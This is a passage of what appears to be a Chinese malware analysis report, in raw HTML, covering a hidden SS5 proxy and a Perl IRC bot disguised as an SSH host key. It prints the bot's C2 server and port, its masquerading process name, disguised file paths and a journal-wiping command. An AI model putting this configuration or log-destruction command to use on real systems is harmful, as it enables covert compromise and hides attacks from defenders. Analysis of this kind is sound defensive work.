style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(0,0,204);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">-53</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(17,102,68);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">10000000</span></span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><span textstyle="" style="font-weight: bold;">SS5 配置</span></span></p><table style="border-collapse:collapse;width:426.1000pt;border:none;mso-border-left-alt:0.5000pt solid rgb(223,226,229);mso-border-top-alt:0.5000pt solid rgb(223,226,229);mso-border-right-alt:0.5000pt solid rgb(223,226,229);mso-border-bottom-alt:0.5000pt solid rgb(223,226,229);mso-padding-alt:0.0000pt 0.0000pt 0.0000pt 0.0000pt;"><tbody><tr><td data-colwidth="167" width="167" valign="center" style="padding: 3.6pt 7.8pt;border-width: 1pt 1pt medium;border-style: solid solid none;border-color: rgb(223, 226, 229) rgb(223, 226, 229) currentcolor;"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;"><b><span style="font-family:宋体;font-weight:bold;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><font face="宋体"><span leaf="">参数</span></font></span></b></p></td><td data-colwidth="684" width="684" valign="center" style="padding: 3.6pt 7.8pt;border-width: 1pt 1pt medium medium;border-style: solid solid none none;border-color: rgb(223, 226, 229) rgb(223, 226, 229) currentcolor currentcolor;"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;"><b><span style="font-family:宋体;font-weight:bold;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><font face="宋体"><span leaf="">说明</span></font></span></b></p></td></tr><tr><td data-colwidth="167" width="167" valign="center" style="padding: 3.6pt 7.8pt;border-width: 1pt;border-style: solid;border-color: rgb(223, 226, 229);"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;"><span style="font-family:var(--monospace);mso-fareast-font-family:宋体;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(243,244,244);mso-shading:rgb(243,244,244);"><span leaf="">-m</span></span></p></td><td data-colwidth="684" width="684" valign="center" style="padding: 3.6pt 7.8pt;border-width: 1pt 1pt 1pt medium;border-style: solid solid solid none;border-color: rgb(223, 226, 229) rgb(223, 226, 229) rgb(223, 226, 229) currentcolor;"><p style="margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;text-align:left;"><span style="font-family:var(--monospace);mso-fareast-font-family:宋体;mso-hansi-font-family:宋体;mso-bidi-font-family:宋体;font-size:9.0000pt;mso-font-kerning:0.0000pt;"><font face="宋体"><span leaf="">静默模式</span></font><span leaf=""> (</span><font face="宋体"><span leaf="">不输出日志</span></font><font face="var(--monospace)"><span leaf="">)</span></font></span></p></td></tr><tr><td data-colwidth="167" width="167" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt;border-style: none solid solid;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229);background: rgb(248, 248, 248);"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;"><span style="font-family:var(--monospace);mso-fareast-font-family:宋体;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(243,244,244);mso-shading:rgb(243,244,244);"><span leaf="">-t</span></span></p></td><td data-colwidth="684" width="684" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt medium;border-style: none solid solid none;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229) currentcolor;background: rgb(248, 248, 248);"><p style="margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;text-align:left;"><span style="font-family:var(--monospace);mso-fareast-font-family:宋体;mso-hansi-font-family:宋体;mso-bidi-font-family:宋体;font-size:9.0000pt;mso-font-kerning:0.0000pt;"><font face="宋体"><span leaf="">线程模式</span></font></span></p></td></tr><tr><td data-colwidth="167" width="167" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt;border-style: none solid solid;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229);"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;"><span style="font-family:var(--monospace);mso-fareast-font-family:宋体;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(243,244,244);mso-shading:rgb(243,244,244);"><span leaf="">-p</span></span></p></td><td data-colwidth="684" width="684" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt medium;border-style: none solid solid none;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229) currentcolor;"><p style="margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;text-align:left;"><span style="font-family:var(--monospace);mso-fareast-font-family:宋体;mso-hansi-font-family:宋体;mso-bidi-font-family:宋体;font-size:9.0000pt;mso-font-kerning:0.0000pt;"><span leaf="">PID </span><font face="宋体"><span leaf="">文件路径 </span></font><font face="var(--monospace)"><span leaf="">(</span></font></span><span style="font-family:var(--monospace);mso-fareast-font-family:宋体;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(243,244,244);mso-shading:rgb(243,244,244);"><span leaf="">/usr/share/terminfo/w/wy66-qa</span></span><span style="font-family:var(--monospace);mso-fareast-font-family:宋体;mso-hansi-font-family:宋体;mso-bidi-font-family:宋体;font-size:9.0000pt;mso-font-kerning:0.0000pt;"><span leaf="">)</span></span></p></td></tr><tr><td data-colwidth="167" width="167" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt;border-style: none solid solid;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229);background: rgb(248, 248, 248);"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;"><span style="font-family:var(--monospace);mso-fareast-font-family:宋体;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(243,244,244);mso-shading:rgb(243,244,244);"><span leaf="">-b</span></span></p></td><td data-colwidth="684" width="684" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt medium;border-style: none solid solid none;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229) currentcolor;background: rgb(248, 248, 248);"><p style="margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;text-align:left;"><span style="font-family:var(--monospace);mso-fareast-font-family:宋体;mso-hansi-font-family:宋体;mso-bidi-font-family:宋体;font-size:9.0000pt;mso-font-kerning:0.0000pt;"><font face="宋体"><span leaf="">绑定地址</span></font><span leaf="">:</span><font face="宋体"><span leaf="">端口 </span></font><font face="var(--monospace)"><span leaf="">(</span></font></span><span style="font-family:var(--monospace);mso-fareast-font-family:宋体;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(243,244,244);mso-shading:rgb(243,244,244);"><span leaf="">0.0.0.0:$port</span></span><span style="font-family:var(--monospace);mso-fareast-font-family:宋体;mso-hansi-font-family:宋体;mso-bidi-font-family:宋体;font-size:9.0000pt;mso-font-kerning:0.0000pt;"><span leaf="">)</span></span></p></td></tr><tr><td data-colwidth="167" width="167" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt;border-style: none solid solid;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229);"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;"><span style="font-family:var(--monospace);mso-fareast-font-family:宋体;mso-hansi-font-family:宋体;mso-bidi-font-family:宋体;font-size:9.0000pt;mso-font-kerning:0.0000pt;"><font face="宋体"><span leaf="">默认端口</span></font></span></p></td><td data-colwidth="684" width="684" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt medium;border-style: none solid solid none;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229) currentcolor;"><p style="margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;text-align:left;"><span style="font-family:var(--monospace);mso-fareast-font-family:宋体;mso-hansi-font-family:宋体;mso-bidi-font-family:宋体;font-size:9.0000pt;mso-font-kerning:0.0000pt;"><font face="宋体"><span leaf="">由脚本</span></font></span><span style="font-family:var(--monospace);mso-fareast-font-family:宋体;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(243,244,244);mso-shading:rgb(243,244,244);"><span leaf="">$1</span></span><span style="font-family:var(--monospace);mso-fareast-font-family:宋体;mso-hansi-font-family:宋体;mso-bidi-font-family:宋体;font-size:9.0000pt;mso-font-kerning:0.0000pt;"><font face="宋体"><span leaf="">参数决定</span></font></span></p></td></tr></tbody></table><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><span textstyle="" style="font-weight: bold;">伪装路径</span></span></p><p style="margin-right: 0pt;margin-left: 0pt;" data-pm-slice="0 0 []"><span style="mso-spacerun:&#39;yes&#39;;font-family:Helvetica;color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.5000pt;mso-font-kerning:1.0000pt;"><span leaf="">SS5 PID 文件: </span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;background:rgb(243,244,244);mso-shading:rgb(243,244,244);"><span leaf="">/usr/share/terminfo/w/wy66-qa</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:Helvetica;color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.5000pt;mso-font-kerning:1.0000pt;"><span leaf=""> (伪装成 terminfo 数据库条目)</span></span></p><p style="margin-right: 0pt;margin-left: 0pt;"><span style="mso-spacerun:&#39;yes&#39;;font-family:Helvetica;color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.5000pt;mso-font-kerning:1.0000pt;"><span leaf="">SS5 可执行文件: 随机 8 字符 MD5 前缀, 执行后立即删除</span></span></p><p style="margin-right: 0pt;margin-left: 0pt;"><span style="mso-spacerun:&#39;yes&#39;;font-family:Helvetica;color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.5000pt;mso-font-kerning:1.0000pt;"><span leaf="">SS5 原始文件: </span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;background:rgb(243,244,244);mso-shading:rgb(243,244,244);"><span leaf="">/etc/$hhide/dnsresolve</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:Helvetica;color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.5000pt;mso-font-kerning:1.0000pt;"><span leaf=""> (被 rootkit 隐藏)</span></span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><span textstyle="" style="font-weight: bold;">日志清除收尾</span></span></p><p style="margin-left: 0pt;border-width: 1pt;border-style: solid;border-color: rgb(231, 234, 237);padding: 4pt 2pt 3pt;background: rgb(248, 248, 248);" data-pm-slice="0 0 []"><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">journalctl </span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(0,0,204);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">--vacuum-time</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(152,26,26);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">=</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">1s    </span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(170,85,0);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""># 清空 systemd journal 日志</span></span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf=""><span textstyle="" style="font-size: 18px;">3.ssh_host_dsa_key.pub</span></span></span></strong></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">该文件与59a515e28d1515ae同源不同构建，通过 SSC 自解压编译器投递，嵌入 Perl 脚本 (~46KB) 实现 IRC C2 通信、DDoS 攻击、漏洞扫描、反向 Shell、日志清除等全功能。基于 &#34;LiGhT&#39;s Modded perlbot v2&#34; (Sida/Perlbot 变种)。文件名伪装为 SSH 主机密钥 (.pub)。释放的Perl脚本具备以下功能：</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><span textstyle="" style="font-weight: bold;">C2 配置</span></span></p><p style="margin-left: 0pt;border-width: 1pt;border-style: solid;border-color: rgb(231, 234, 237);padding: 4pt 2pt 3pt;background: rgb(248, 248, 248);" data-pm-slice="0 0 []"><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(0,0,255);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">my</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(0,0,0);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">$processo</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(152,26,26);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">=</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(170,17,17);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">&#39;usr/sbin/httpd&#39;</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">;           </span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(170,85,0);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""># 伪装</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:宋体;mso-ascii-font-family:var(--monospace);mso-hansi-font-family:var(--monospace);mso-bidi-font-family:var(--monospace);color:rgb(170,85,0);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><font face="宋体"><span leaf="">的进程名</span></font></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""><br/></span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(0,0,255);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">my</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(0,0,0);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">$linas_max</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(152,26,26);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">=</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(170,17,17);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">&#39;10&#39;</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">;                       </span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(170,85,0);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""># 每批输出行数</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""><br/></span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(0,0,255);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">my</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(0,0,0);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">$sleep</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(152,26,26);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">=</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(170,17,17);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">&#39;5&#39;</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">;                        </span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(170,85,0);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""># 批次间隔</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""><br/></span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(0,0,255);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">my</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(0,0,0);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">$servidor</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(152,26,26);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">=</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(170,17,17);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">&#39;adam.established.site&#39;</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">;    </span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(170,85,0);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""># ★ C2 IRC 服务器</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""><br/></span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(0,0,255);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">my</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(0,0,0);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">$porta</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(152,26,26);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">=</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(170,17,17);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">&#39;80&#39;</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">;                       </span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(170,85,0);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""># ★ 端口80</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""><br/></span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(0,0,255);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">my</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(0,0,0);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">@adms</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(152,26,26);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">=</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""> (</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(170,17,17);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">&#34;qwerty&#34;</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">,</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(170,17,17);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">&#34;asdfgh1&#34;</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">,</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(170,17,17);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">&#34;zxcvbn1&#34;</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">,</span></span><span 